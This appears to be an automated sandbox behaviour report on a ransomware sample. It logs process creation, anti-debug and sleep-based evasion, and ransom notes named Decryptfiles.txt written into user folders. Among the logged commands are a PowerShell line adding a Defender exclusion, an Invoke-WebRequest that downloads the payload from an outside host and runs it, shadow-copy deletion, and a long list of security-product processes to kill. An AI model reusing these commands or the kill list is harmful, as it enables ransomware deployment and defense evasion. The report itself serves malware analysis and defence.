Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: eryy65ty.exe, 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 00000014.00000000.1580004166.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001B.00000000.1754914879.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001E.00000000.1837388986.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe.14.drBinary or memory string: COULD NOT CREATE CHILD PROCESSWOW64DISABLEWOW64FSREDIRECTIONKERNEL32.DLLWOW64REVERTWOW64FSREDIRECTIONABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\WMIC.EXE\..\\WBEM\\SYSTEM32\\WINDOWS\C:\SHADOWCOPY DELETEAVPMAPP.EXE,ECONCEAL.EXE,SECHEALTHUI.EXE,RUNTIMEBROKER.EXE,ESCANMON.EXE,ESCANPRO.EXE,TRAYSSER.EXE,TRAYICOS.EXE,ECONSER.EXE,VIEWTCP.EXE,FSHDLL64.EXE,FSGK32.EXE,FSHOSTER32.EXE,FSMA32.EXE,FSORSP.EXE,FSSM32.EXE,FSM32.EXE,TRIGGER.EXE,FPROTTRAY.EXE,FPWIN.EXE,FPAVSERVER.EXE,AVK.EXE,GDBGINX64.EXE,AVKPROXY.EXE,GDSCAN.EXE,AVKWCTLX64.EXE,AVKSERVICE.EXE,AVKTRAY.EXE,GDKBFLTEXE32.EXE,GDSC.EXE,VIRUSUTILITIES.EXE,GUARDXSERVICE.EXE,GUARDXKICKOFF_X64.EXE,IPTRAY.EXE,FRESHCLAM.EXE,FRESHCLAMWRAP.EXE,K7RTSCAN.EXE,K7FWSRVC.EXE,K7PSSRVC.EXE,K7EMLPXY.EXE,K7TSECURITY.EXE,K7AVSCAN.EXE,K7CRVSVC.EXE,K7SYSMON.EXE,K7TSMAIN.EXE,K7TSMNGR.EXE,MPCMDRUN.EXE,NANOSVC.EXE,NANOAV.EXE,NNF.EXE,NVCSVC.EXE,NBROWSER.EXE,NSEUPDATESVC.EXE,NFSERVICE.EXE,CMD.EXETASKKILL/IMNWSCMON.EXE,NJEEVES2.EXE,NVCOD.EXE,NVOY.EXE,ZLHH.EXE,ZLH.EXE,NPROSEC.EXE,ZANDA.EXE,NS.EXE,ACS.EXE,OP_MON.EXE,PSANHOST.EXE,PSUAMAIN.EXE,PSUASERVICE.EXE,AGENTSVC.EXE,BDSSVC.EXE,EMLPROXY.EXE,OPSSVC.EXE,ONLINENT.EXE,QUHLPSVC.EXE,SAPISSVC.EXE,SCANNER.EXE,SCANWSCS.EXE,SCPROXYSRV.EXE,SCSECSVC.EXE,SUPERANTISPYWARE.EXE,SASCORE64.EXE,SSUPDATE64.EXE,SUPERDELETE.EXE,SASTASK.EXE,K7RTSCAN.EXE,K7FWSRVC.EXE,K7PSSRVC.EXE,K7EMLPXY.EXE,K7TSECURITY.EXE,K7AVSCAN.EXE,K7CRVSVC.EXE,K7SYSMON.EXE,K7TSMAIN.EXE,K7TSMNGR.EXE,UIWINMGR.EXE,UIWATCHDOG.EXE,UISEAGNT.EXE,PTWATCHDOG.EXE,PTSVCHOST.EXE,PTSESSIONAGENT.EXE,COREF
RAMEWORKHOST.EXE,CORESERVICESHELL.EXE,UIUPDATETRAY.EXE,VIPREUI.EXE,SBAMSVC.EXE,SBAMTRAY.EXE,SBPIMSVC.EXE,BAVHM.EXE,BAVSVC.EXE,BAVTRAY.EXE,BAV.EXE,BAVWEBCLIENT.EXE,BAVUPDATER.EXE,MCSHIELDCCC.EXE,MCSHIELDRTM.EXE,MCSHIELDDS.EXE,MCS-UNINSTALL.EXE,SDSCAN.EXE,SDFSSVC.EXE,SDWELCOME.EXE,SDTRAY.EXE,UNTHREAT.EXE,UTSVC.EXE,FORTICLIENT.EXE,FCAPPDB.EXE,FCDBLOG.EXE,FCHELPER64.EXE,FMON.EXE,FORTIESNAC.EXE,FORTIPROXY.EXE,FORTISSLVPNDAEMON.EXE,FORTITRAY.EXE,FORTIFW.EXE,FORTICLIENT_DIAGNOSTIC_TOOL.EXE,AV_TASK.EXE,CERTREG.EXE,FILMSG.EXE,FILUP.EXE,FILWSCC.EXE,FILWSCC.EXE,PSVIEW.EXE,QUAMGR.EXE,QUAMGR.EXE,SCHMGR.EXE,SCHMGR.EXE,TWSSCAN.EXE,TWSSRV.EXE,USERREG.EXESEDEBUGPRIVILEGECOULD NOT SET SE_DEBUG_NAME PRIVILEGE
Source: eryy65ty.exe, 00000014.00000002.2679325725.000000000A42D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ,AVPMAPP.EXEECONCEAL.EXESECHEALTHUI.EXERUNTIMEBROKER.EXEESCANMON.EXEESCANPRO.EXETRAYSSER.EXETRAYICOS.EXEECONSER.EXEVIEWTCP.EXEFSHDLL64.EXEFSGK32.EXEFSHOSTER32.EXEFSMA32.EXEFSORSP.EXEFSSM32.EXEFSM32.EXETRIGGER.EXEFPROTTRAY.EXEFPWIN.EXEFPAVSERVER.EXEAVK.EXEGDBGINX64.EXEAVKPROXY.EXEGDSCAN.EXEAVKWCTLX64.EXEAVKSERVICE.EXEAVKTRAY.EXEGDKBFLTEXE32.EXEGDSC.EXEVIRUSUTILITIES.EXEGUARDXSERVICE.EXEGUARDXKICKOFF_X64.EXEIPTRAY.EXEFRESHCLAM.EXEFRESHCLAMWRAP.EXEK7RTSCAN.EXEK7FWSRVC.EXEK7PSSRVC.EXEK7EMLPXY.EXEK7TSECURITY.EXEK7AVSCAN.EXEK7CRVSVC.EXEK7SYSMON.EXEK7TSMAIN.EXEK7TSMNGR.EXEMPCMDRUN.EXENANOSVC.EXENANOAV.EXENNF.EXENVCSVC.EXENBROWSER.EXENSEUPDATESVC.EXENFSERVICE.EXECMD.EXETASKKILL/IMNWSCMON.EXENJEEVES2.EXENVCOD.EXENVOY.EXEZLHH.EXEZLH.EXENPROSEC.EXEZANDA.EXENS.EXEACS.EXEOP_MON.EXEPSANHOST.EXEPSUAMAIN.EXEPSUASERVICE.EXEAGENTSVC.EXEBDSSVC.EXEEMLPROXY.EXEOPSSVC.EXEONLINENT.EXEQUHLPSVC.EXESAPISSVC.EXESCANNER.EXESCANWSCS.EXESCPROXYSRV.EXESCSECSVC.EXESUPERANTISPYWARE.EXESASCORE64.EXESSUPDATE64.EXESUPERDELETE.EXESASTASK.EXEK7RTSCAN.EXEK7FWSRVC.EXEK7PSSRVC.EXEK7EMLPXY.EXEK7TSECURITY.EXEK7AVSCAN.EXEK7CRVSVC.EXEK7SYSMON.EXEK7TSMAIN.EXEK7TSMNGR.EXEUIWINMGR.EXEUIWATCHDOG.EXEUISEAGNT.EXEPTWATCHDOG.EXEPTSVCHOST.EXEPTSESSIONAGENT.EXECOREFRAMEWORKHOST.EXECORESERVICESHELL.EXEUIUPDATETRAY.EXEVIPREUI.EXESBAMSVC.EXESBAMTRAY.EXESBPIMSVC.EXEBAVHM.EXEBAVSVC.EXEBAVTRAY.EXEBAV.EXEBAVWEBCLIENT.EXEBAVUPDATER.EXEMCSHIELDCCC.EXEMCSHIELDRTM.EXEMCSHIELDDS.EXEMCS-UNINSTALL.EXESDSCAN.EXESDFSSVC.EXESDWELCOME.EXESDTRAY.EXEUNTHREAT.EXEUTSVC.EXEFORTICLIENT.EXEFCAPPDB.EXEFCDBLOG.EXEFCHELPER64.EXEFMON.EXEFORTIESNAC.EXEFORTIPROXY.EXEFORTISSLVPNDAEMON.EXEFORTITRAY.EXEFORTIFW.EXEFORTICLIENT_DIAGNOSTIC_TOOL.EXEAV_TASK.EXECERTREG.EXEFILMSG.EXEFILUP.EXE
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6459
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1283
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5854
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1561
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5918
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3803
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5746
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3613
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_20-51006
Source: C:\Windows\System32\loaddll32.exe API coverage: 4.8 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep count: 6459 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2052 Thread sleep count: 1283 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7312 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep count: 5854 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep count: 1561 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3232 Thread sleep count: 5918 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300 Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3232 Thread sleep count: 3803 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2772 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2332 Thread sleep count: 5746 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2288 Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5652 Thread sleep count: 3613 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2916 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2056 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2768 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 1996 Thread sleep time: -41769s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 6816 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 6472 Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 3424 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D419B85 FindFirstFileExA,0_2_6D419B85
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: 20_2_00E3DF60 IsDebuggerPresent,GetLastError,FindFirstFileW,GetLastError,GetLastError,GetLastError,CopyFileA,Sleep,FindNextFileW,GetLastError,FindClose,20_2_00E3DF60
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: 20_2_00EAAB8F FindFirstFileExA,20_2_00EAAB8F
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File opened: D:\sources\migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File opened: D:\sources\replacementmanifests\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File opened: D:\sources\migration\wtr\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File opened: D:\sources\replacementmanifests\hwvid-migration-2\
Source: 1696493971742.d1a7a52e-e3c7-4e69-93b1-055dbe542ec9.main.jsonlz4.27.drBinary or memory string: "VMware V[
Source: eryy65ty.exe, 00000014.00000002.2671850861.000000000090E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D40866B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D40866B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D41995A mov eax, dword ptr fs:[00000030h]0_2_6D41995A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D4102D7 mov eax, dword ptr fs:[00000030h]0_2_6D4102D7
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: 20_2_00EA5FD1 mov eax, dword ptr fs:[00000030h]20_2_00EA5FD1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: 20_2_00EA6016 mov eax, dword ptr fs:[00000030h]20_2_00EA6016
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: 20_2_00EA0A75 mov eax, dword ptr fs:[00000030h]20_2_00EA0A75
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D41A779 GetProcessHeap,0_2_6D41A779
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D40D160 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D40D160
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D408390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6D408390
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: 20_2_00E9C1E9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00E9C1E9
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: 20_2_00E8E2E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00E8E2E4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: 20_2_00E8E4E1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00E8E4E1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: 20_2_00E8E644 SetUnhandledExceptionFilter,20_2_00E8E644

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D408854 cpuid 0_2_6D408854
Source: C:\Windows\System32\loaddll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_6D41D567
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,0_2_6D41DDDF
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6D41DCD7
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,0_2_6D41D741
Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,0_2_6D41D7EA
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,0_2_6D414EF1
Source: C:\Windows\System32\loaddll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_6D41DEB2
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_6D41D95E
Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,0_2_6D4149A3
Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,0_2_6D41D835
Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,0_2_6D41D8D0
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,0_2_6D41DBAE
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_00EAE076
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: EnumSystemLocalesW,20_2_00EA468D
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: GetLocaleInfoW,20_2_00EA4CE0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_00EAD72B
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: EnumSystemLocalesW,20_2_00EAD9F9
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: EnumSystemLocalesW,20_2_00EAD9AE
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: EnumSystemLocalesW,20_2_00EADA94
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_00EADB22
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: GetLocaleInfoW,20_2_00EADD72
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_00EADE9B
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe Code function: GetLocaleInfoW,20_2_00EADFA3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D408592 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6D408592

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addons.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackups\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\addonStartup.json.lz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\compatibility.ini
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\containers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\content-prefs.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
